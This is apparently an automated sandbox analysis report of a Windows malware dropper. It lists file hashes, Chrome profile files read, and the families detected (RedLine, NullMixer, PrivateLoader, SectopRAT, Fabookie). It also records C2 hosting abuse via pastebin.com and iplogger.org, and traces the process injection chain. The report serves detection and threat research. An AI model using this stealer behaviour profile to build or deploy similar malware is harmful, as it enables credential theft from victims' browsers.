SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/4600-326-0x0000000000400000-0x00000000005F0000-memory.dmp

memory/4628-328-0x0000000000400000-0x0000000002F29000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 7e0273bd7648f4e550c335ade6197814
SHA1 8fa8973be4eacf5d8c609f91ead0339211307a47
SHA256 4ea9e9feaf6f25e70b873217c629f607b40775e1dd5d0b33e3d53387d43f6b9e
SHA512 4b893cf514cfcb52c807745c782525c7ea4ec86316f24eece53769e29d7e38d1143e64ae199fd7eb098302ac81a992caea568c9ad5b90b236d624a51af2b4af1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c3820c81ec1b128434c23227b7f67b7e
SHA1 110f7dc0a314549ddd1d2f0ae1212c31221a53a4
SHA256 398ded4236eed133199790229feca6a8c95f03f5c4eea12c244d01537163f7a7
SHA512 84e844106da4ca0f71c01f1f8adfbacb5f7edfa7206d2b90a2b1d8c91e72d274b198543d6390a1dfe80cea192270be61b644a33d56a7d69da2ca52f01a7a0750

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\1bcbe15f-c4c2-4c3d-8417-f0c28db054b1.tmp

MD5 6bf32e36ff9edc37cd2e124b33e9b175
SHA1 21ba1532eb1a4365834576c2ed0621ee59a7114f
SHA256 42d89ba94767d31e54326fc4da5f64c47064f49c4615d5c8b062a4d30daec1d5
SHA512 92d83530ff7508dee7c53c335d4977dbd543af9a3526e7ea3539961abde88664285c59316f47982a80fbc0b6ff8db1583eb91cf198c90786113a066291d15700

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f9e69a2fcdf7fd37d80a169ce351e5a4
SHA1 c025a2a9fbf35d90e4a5fa47c837a06f67ce7490
SHA256 f86a0d466c66bef3bafc3a8814570e0da1aaa0079532ed48236c135454d3cd66
SHA512 98f8cff15b5a74d7d83471b7d8fbb8dcf3db8f13abbf21963bc7a8372f1a839e858511c5ab2a017a66e8203f17c638dc2f423e3a59582943b3aab51e741b0a0d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 9e1b05594189760513e337b54060abd4
SHA1 a8a50277b28debef0094e221db70059b29595e24
SHA256 93cabdd2049500e15c9f860a3a7221aaf4ea30c60ce1a4f0867424a2d934310a
SHA512 ddc167999b0608aa508056afa93cbecfa74f004adf4518bf3002e8a13d7b1a102d6aeddbf69c8b784102bc0881dea944a0c724217dd79d134a21ce40b9e6ec49

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 02be32d89743d1df48bbee44951e2de0
SHA1 7e812fcfcfe4843076ff6d8dafe334e5c6199101
SHA256 65d34deceb0e93f55a4866349f465fccd23ef2a6f01833eb10bb7d0a2b9efd5d
SHA512 92c039068e79c476f7685ae33fd60ec9921075df1306325f89ed600ef5fe2baa36992114b1d9551530079bdf5bd06b7d1bd5d3438f46a6ef14782561769c8a88

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 5a3e34c2d3ef9052a45ce1ca45bf4cd0
SHA1 8a0aa3e5e9b8fb93794d34835e07d137306b1098
SHA256 f453b372bbb7d9b5fe11be9bed569dbbb37ee006a37606ef533ba4a02bee7766
SHA512 76e712b60f2a3393206372b9c965b7c89baec32ef2f85a84774d40a609c4c96e7e5861eea7d5506a49a8da63ef2634337bcb8b68d345e9f6c20d418c58aca852

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 fb91b4ac6e41cdd1d88298f66e7b67a0
SHA1 8ebc18db1e1e10566dae466fed262f8f66789b01
SHA256 dc7d210511a3d2dfac949e6f63789ca89afe8c344eab02500e3ff30978db75cb
SHA512 8eea2cb8c828e136fa4437c72cc91fd379e70b22b390d3dd33c631f725c6052db49cd2e307cd0d7085d080b49d1ef9a0d894dafaae6c8e7354c8e53106f8acb5

C:\Users\Admin\AppData\Local\Temp\scoped_dir4020_2079967159\8fffdd61-bc16-4c11-9eb5-555a589da5ba.tmp

MD5 da75bb05d10acc967eecaac040d3d733
SHA1 95c08e067df713af8992db113f7e9aec84f17181
SHA256 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2
SHA512 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

C:\Users\Admin\AppData\Local\Temp\scoped_dir4020_2079967159\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Temp\scoped_dir4020_2079967159\CRX_INSTALL\manifest.json

MD5 35068e2550395a8a3e74558f2f4658da
SHA1 bd6620054059bfb7a27a4fff86b9966727f2c2b9
SHA256 e2f418c816895e830541f48c0406b9398805e88b61a4ec816244154cd793743c
SHA512 4bcb971d7353648abf25aca7a4a4771f62bbb76f8fc13bde886f29826d9314f5101942492004fc719493604d317958b63a95cf5173f8180214f27d6bea303f97

C:\Users\Admin\AppData\Local\Temp\scoped_dir4020_2079967159\CRX_INSTALL\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\zu\messages.json

MD5 71f916a64f98b6d1b5d1f62d297fdec1
SHA1 9386e8f723c3f42da5b3f7e0b9970d2664ea0baa
SHA256 ec78ddd4ccf32b5d76ec701a20167c3fbd146d79a505e4fb0421fc1e5cf4aa63
SHA512 30fa4e02120af1be6e7cc7dbb15fae5d50825bd6b3cf28ef21d2f2e217b14af5b76cfcc165685c3edc1d09536bfcb10ca07e1e2cc0da891cec05e19394ad7144

C:\Users\Admin\AppData\Local\Temp\scoped_dir4020_2079967159\CRX_INSTALL\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\km\messages.json

MD5 b3699c20a94776a5c2f90aef6eb0dad9
SHA1 1f9b968b0679a20fa097624c9abfa2b96c8c0bea
SHA256 a6118f0a0de329e07c01f53cd6fb4fed43e54c5f53db4cd1c7f5b2b4d9fb10e6
SHA512 1e8d15b8bff1d289434a244172f9ed42b4bb6bcb6372c1f300b01acea5a88167e97fedaba0a7ae3beb5e24763d1b09046ae8e30745b80e2e2fe785c94df362f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\af\messages.json

MD5 12403ebcce3ae8287a9e823c0256d205
SHA1 c82d43c501fae24bfe05db8b8f95ed1c9ac54037
SHA256 b40bde5b612cfff936370b32fb0c58cc205fc89937729504c6c0b527b60e2cba
SHA512 153401ecdb13086d2f65f9b9f20acb3cefe5e2aeff1c31ba021be35bf08ab0634812c33d1d34da270e5693a8048fc5e2085e30974f6a703f75ea1622a0ca0ffd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\am\messages.json

MD5 9721ebce89ec51eb2baeb4159e2e4d8c
SHA1 58979859b28513608626b563138097dc19236f1f
SHA256 3d0361a85adfcd35d0de74135723a75b646965e775188f7dcdd35e3e42db788e
SHA512 fa3689e8663565d3c1c923c81a620b006ea69c99fb1eb15d07f8f45192ed9175a6a92315fa424159c1163382a3707b25b5fc23e590300c62cbe2dace79d84871

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ar\messages.json

MD5 3ec93ea8f8422fda079f8e5b3f386a73
SHA1 24640131ccfb21d9bc3373c0661da02d50350c15
SHA256 abd0919121956ab535e6a235de67764f46cfc944071fcf2302148f5fb0e8c65a
SHA512 f40e879f85bc9b8120a9b7357ed44c22c075bf065f45bea42bd5316af929cbd035d5d6c35734e454aef5b79d378e51a77a71fa23f9ebd0b3754159718fceb95c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\az\messages.json

MD5 9a798fd298008074e59ecc253e2f2933
SHA1 1e93da985e880f3d3350fc94f5ccc498efc8c813
SHA256 628145f4281fa825d75f1e332998904466abd050e8b0dc8bb9b6a20488d78a66
SHA512 9094480379f5ab711b3c32c55fd162290cb0031644ea09a145e2ef315da12f2e55369d824af218c3a7c37dd9a276aeec127d8b3627d3ab45a14b0191ed2bbe70

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\be\messages.json

MD5 68884dfda320b85f9fc5244c2dd00568
SHA1 fd9c01e03320560cbbb91dc3d1917c96d792a549
SHA256 ddf16859a15f3eb3334d6241975ca3988ac3eafc3d96452ac3a4afd3644c8550
SHA512 7ff0fbd555b1f9a9a4e36b745cbfcad47b33024664f0d99e8c080be541420d1955d35d04b5e973c07725573e592cd0dd84fdbb867c63482baff6929ada27ccde

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\bg\messages.json

MD5 2e6423f38e148ac5a5a041b1d5989cc0
SHA1 88966ffe39510c06cd9f710dfac8545672ffdceb
SHA256 ac4a8b5b7c0b0dd1c07910f30dcfbdf1bcb701cfcfd182b6153fd3911d566c0e
SHA512 891fcdc6f07337970518322c69c6026896dd3588f41f1e6c8a1d91204412cae01808f87f9f2dea1754458d70f51c3cef5f12a9e3fc011165a42b0844c75ec683

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\bn\messages.json

MD5 651375c6af22e2bcd228347a45e3c2c9
SHA1 109ac3a912326171d77869854d7300385f6e628c
SHA256 1dbf38e425c5c7fc39e8077a837df0443692463ba1fbe94e288ab5a93242c46e
SHA512 958aa7cf645fab991f2eca0937ba734861b373fb1c8bcc001599be57c65e0917f7833a971d93a7a6423c5f54a4839d3a4d5f100c26efa0d2a068516953989f9d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ca\messages.json

MD5 d177261ffe5f8ab4b3796d26835f8331
SHA1 4be708e2ffe0f018ac183003b74353ad646c1657
SHA256 d6e65238187a430ff29d4c10cf1c46b3f0fa4b91a5900a17c5dfd16e67ffc9bd
SHA512 e7d730304aed78c0f4a78dadbf835a22b3d8114fb41d67b2b26f4fe938b572763d3e127b7c1c81ebe7d538da976a7a1e7adc40f918f88afadea2201ae8ab47d0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\cs\messages.json

MD5 ccb00c63e4814f7c46b06e4a142f2de9
SHA1 860936b2a500ce09498b07a457e0cca6b69c5c23
SHA256 21ae66ce537095408d21670585ad12599b0f575ff2cb3ee34e3a48f8cc71cfab
SHA512 35839dac6c985a6ca11c1bff5b8b5e59db501fcb91298e2c41cb0816b6101bf322445b249eaea0cef38f76d73a4e198f2b6e25eea8d8a94ea6007d386d4f1055

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\cy\messages.json


Analysis: behavioral22

Detonation Overview

Submitted 2024-11-10 17:24

Reported 2024-11-10 17:27

Platform win10v2004-20241007-en

Max time kernel 79s

Max time network 153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4272 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Windows\SysWOW64\cmd.exe
PID 4272 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Windows\SysWOW64\cmd.exe
PID 4272 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
PID 1136 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
PID 1136 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
PID 4908 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2304 wrote to memory of 3816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2304 wrote to memory of 3816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2304 wrote to memory of 3816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4908 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
